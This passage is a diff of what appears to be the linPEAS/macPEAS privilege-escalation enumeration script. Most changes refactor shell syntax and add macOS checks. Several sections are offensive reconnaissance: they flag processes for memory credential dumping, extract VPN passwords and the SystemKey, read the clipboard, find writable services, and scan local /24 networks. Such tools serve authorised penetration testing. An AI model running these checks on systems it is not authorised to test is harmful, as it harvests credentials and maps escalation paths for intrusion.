"s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," echo "" fi #-- PCS) Processes with credentials inside memory print_2title "Processes with credentials in memory (root req)" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" - if [ "`echo \"$pslist\" | grep \"gdm-password\"`" ]; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi - if [ "`echo \"$pslist\" | grep \"gnome-keyring-daemon\"`" ]; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi - if [ "`echo \"$pslist\" | grep \"lightdm\"`" ]; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi - if [ "`echo \"$pslist\" | grep \"vsftpd\"`" ]; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi - if [ "`echo \"$pslist\" | grep \"apache2\"`" ]; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi - if [ "`echo \"$pslist\" | grep \"sshd:\"`" ]; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi + if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi + if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi + if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi + if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi + if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi + if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi echo "" #-- PCS) Different processes 1 min if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - if [ "`ps -e -o command 2>/dev/null`" ]; then for i in $(seq 1 1250); do ps -e -o command >> $file.tmp1 2>/dev/null; sleep 0.05; done; sort $file.tmp1 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm $file.tmp1; fi + temp_file=$(mktemp) + if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi echo "" fi @@ -1530,15 +1663,55 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then print_2title "Cron jobs" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," command -v incrontab 2>/dev/null || echo_not_found "incrontab" incrontab -l 2>/dev/null ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," crontab -l -u "$USER" 2>/dev/null | tr -d "\r" - ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ 2>/dev/null #MacOS paths + ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths + atq 2>/dev/null echo "" + if [ "$MACPEAS" ]; then + print_2title "Third party LaunchAgents & LaunchDemons" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" + ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null + echo "" + + print_2title "Writable System LaunchAgents & LaunchDemons" + find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! [ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + done + echo "" + + print_2title "StartupItems" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" + ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null + echo "" + + print_2title "Login Items" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" + osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null + echo "" + + print_2title "SPStartupItemDataType" + system_profiler SPStartupItemDataType + echo "" + + print_2title "Emond scripts" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" + ls -l /private/var/db/emondClients + echo "" + fi + #-- PCS) Services print_2title "Services" print_info "Search for outdated versions" @@ -1549,7 +1722,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then print_2title "Systemd PATH" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" - WRITABLESYSTEMDPATH=`systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders"` + WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") echo "" #-- PSC) .service files @@ -1561,14 +1734,14 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" fi - servicebinpaths="`grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" #Get invoked paths + servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths printf "%s\n" "$servicebinpaths\n" | while read sp; do if [ -w "$sp" ]; then echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" fi done - relpath1="`grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' \"$s\" 2>/dev/null | grep -Iv \"=/\"`" - relpath2="`grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' \"$s\" 2>/dev/null | grep -Ev \"/[a-zA-Z0-9_]+/\"`" + relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") if [ "$relpath1" ] || [ "$relpath2" ]; then if [ "$WRITABLESYSTEMDPATH" ]; then echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; @@ -1594,7 +1767,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then if ! [ "$IAMROOT" ] && [ -w "$t" ]; then echo "$t" | sed -${E} "s,.*,${SED_RED},g" fi - timerbinpaths="`grep -Po '^Unit=*(.*?$)' \"$t\" 2>/dev/null | cut -d '=' -f2`" + timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) printf "%s\n" "$timerbinpaths" | while read tb; do if [ -w "$tb" ]; then echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" @@ -1615,14 +1788,14 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" fi - socketsbinpaths="`grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" + socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') printf "%s\n" "$socketsbinpaths" | while read sb; do if [ -w "$sb" ]; then echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" fi done - socketslistpaths="`grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" - printf "%s\n" "$socketsbinpaths" | while read sl; do + socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketslistpaths" | while read sl; do if [ -w "$sl" ]; then echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; fi @@ -1640,11 +1813,11 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then print_2title "HTTP sockets" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1 | while read s; do - socketcurl="`curl --max-time 2 --unix-socket \"$s\" http:/index 2>/dev/null`" + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) if [ $? -eq 0 ]; then - owner="`ls -l \"$s\" | cut -d ' ' -f 3`" - echo "Socket $s owned by $owner uses HTTP. Response to /index:" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "$socketcurl" + owner=$(ls -l "$s" | cut -d ' ' -f 3) + echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" | head -n 30 fi done echo "" @@ -1659,17 +1832,17 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" fi - genpol=`grep "" "$f" 2>/dev/null` - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - userpol=`grep "/dev/null | grep -v "root"` - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi #for g in `groups`; do # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi #done - grppol=`grep "/dev/null | grep -v "root"` - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi #TODO: identify allows in context="default" done @@ -1683,9 +1856,9 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then if [ "$dbuslist" ]; then busctl list | while read line; do echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g"; - if [ ! "`echo \"$line\" | grep -E \"$dbuslistG\"`" ]; then - srvc_object=`echo $line | cut -d " " -f1` - srvc_object_info=`busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' '` + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') if [ "$srvc_object_info" ]; then echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," fi @@ -1701,21 +1874,27 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then fi -if [ "`echo $CHECKS | grep Net`" ]; then +if echo $CHECKS | grep -q Net; then ########################################### #---------) Network Information (---------# ########################################### print_title "Network Information" + if [ "$MACOS" ]; then + print_2title "Network Capabilities" + warn_exec system_profiler SPNetworkDataType + echo "" + fi + #-- NI) Hostname, hosts and DNS print_2title "Hostname, hosts and DNS" cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - dnsdomainname 2>/dev/null || echo_not_found "dnsdomainname" + warn_exec dnsdomainname 2>/dev/null echo "" #-- NI) /etc/inetd.conf print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" - (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" + (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" echo "" #-- NI) Interfaces @@ -1726,10 +1905,19 @@ if [ "`echo $CHECKS | grep Net`" ]; then #-- NI) Neighbours print_2title "Networks and neighbours" - (route || ip n || cat /proc/net/route) 2>/dev/null + if [ "$MACOS" ]; then + netstat -rn 2>/dev/null + else + (route || ip n || cat /proc/net/route) 2>/dev/null + fi (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null echo "" + if [ "$MACPEAS" ]; then + print_2title "Firewall status" + warn_exec system_profiler SPFirewallDataType + fi + #-- NI) Iptables print_2title "Iptables rules" (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" @@ -1738,9 +1926,40 @@ if [ "`echo $CHECKS | grep Net`" ]; then #-- NI) Ports print_2title "Active Ports" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" - ((netstat -punta || ss -ntpu || (netstat -a -p tcp && netstat -a -p udp)) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+,${SED_RED}," + ( (netstat -punta || ss -ntpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," echo "" + #-- NI) MacOS hardware ports + if [ "$MACPEAS" ]; then + print_2title "Hardware Ports" + networksetup -listallhardwareports + echo "" + + print_2title "VLANs" + networksetup -listVLANs + echo "" + + print_2title "Wifi Info" + networksetup -getinfo Wi-Fi + echo "" + + print_2title "Check Enabled Proxies" + scutil --proxy + echo "" + + print_2title "Wifi Proxy URL" + networksetup -getautoproxyurl Wi-Fi + echo "" + + print_2title "Wifi Web Proxy" + networksetup -getwebproxy Wi-Fi + echo "" + + print_2title "Wifi FTP Proxy" + networksetup -getftpproxy Wi-Fi + echo "" + fi + #-- NI) tcpdump print_2title "Can I sniff with tcpdump?" timeout 1 tcpdump >/dev/null 2>&1 @@ -1761,12 +1980,75 @@ if [ "`echo $CHECKS | grep Net`" ]; then wait echo "" fi + + if [ "$AUTO_NETWORK_SCAN" ]; then + print_2title "Scanning local networks (using /24)" + select_nc + local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") + printf "%s\n" "$local_ips" | while read local_ip; do + if ! [ -z "$local_ip" ]; then + print_3title "Discovering hosts in $local_ip/24" + discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp + + sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips + rm $Wfolder/.ips.tmp 2>/dev/null + + while read disc_ip; do + me="" + if [ "$disc_ip" = "$local_ip" ]; then + me=" (local)" + fi + + echo "Scanning top ports of ${disc_ip}${me}" + (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null + echo "" + done < $Wfolder/.ips + + rm $Wfolder/.ips 2>/dev/null + echo "" + fi + done + fi + + if [ "$MACOS" ]; then + print_2title "Any MacOS Sharing Service Enabled?" + rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); + scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); + flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); + rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); + rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); + bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); + printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; + echo "" + print_2title "VPN Creds" + system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," + echo "" + + print_2title "Bluetooth Info" + warn_exec system_profiler SPBluetoothDataType + echo "" + + print_2title "Ethernet Info" + warn_exec system_profiler SPEthernetDataType + echo "" + + print_2title "USB Info" + warn_exec system_profiler SPUSBDataType + echo "" + + #Irrelevant to PE + #print_2title "Airport Info" + #warn_exec system_profiler SPAirPortDataType + #echo "" + fi + echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi -if [ "`echo $CHECKS | grep UsrI`" ]; then +if echo $CHECKS | grep -q UsrI; then ########################################### #----------) Users Information (----------# ########################################### @@ -1775,9 +2057,33 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- UI) My user print_2title "My user" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" echo "" + if [ "$MACPEAS" ];then + print_2title "Current user Login and Logout hooks" + defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + echo "" + + print_2title "All Login and Logout hooks" + defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist + echo "" + + print_2title "Keychains" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" + security list-keychains + echo "" + + print_2title "SystemKey" + ls -l /var/db/SystemKey + if [ -r "/var/db/SystemKey" ]; then + echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + echo "" + fi + #-- UI) PGP keys? print_2title "Do I have PGP keys?" command -v gpg 2>/dev/null || echo_not_found "gpg" @@ -1789,12 +2095,14 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- UI) Clipboard and highlighted text print_2title "Clipboard or highlighted text?" - if [ `command -v xclip 2>/dev/null` ]; then - echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "`xclip -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ `command -v xsel 2>/dev/null` ]; then - echo "Clipboard: "`xsel -ob 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "`xsel -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${SED_RED}," + if [ "$(command -v xclip 2>/dev/null)" ]; then + echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + elif [ "$(command -v xsel 2>/dev/null)" ]; then + echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + elif [ "$(command -v pbpaste 2>/dev/null)" ]; then + echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," else echo_not_found "xsel and xclip" fi echo "" @@ -1802,18 +2110,18 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- UI) Sudo -l print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" + (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" fi - (cat /etc/sudoers | grep -Iv "^$" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" + ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" if 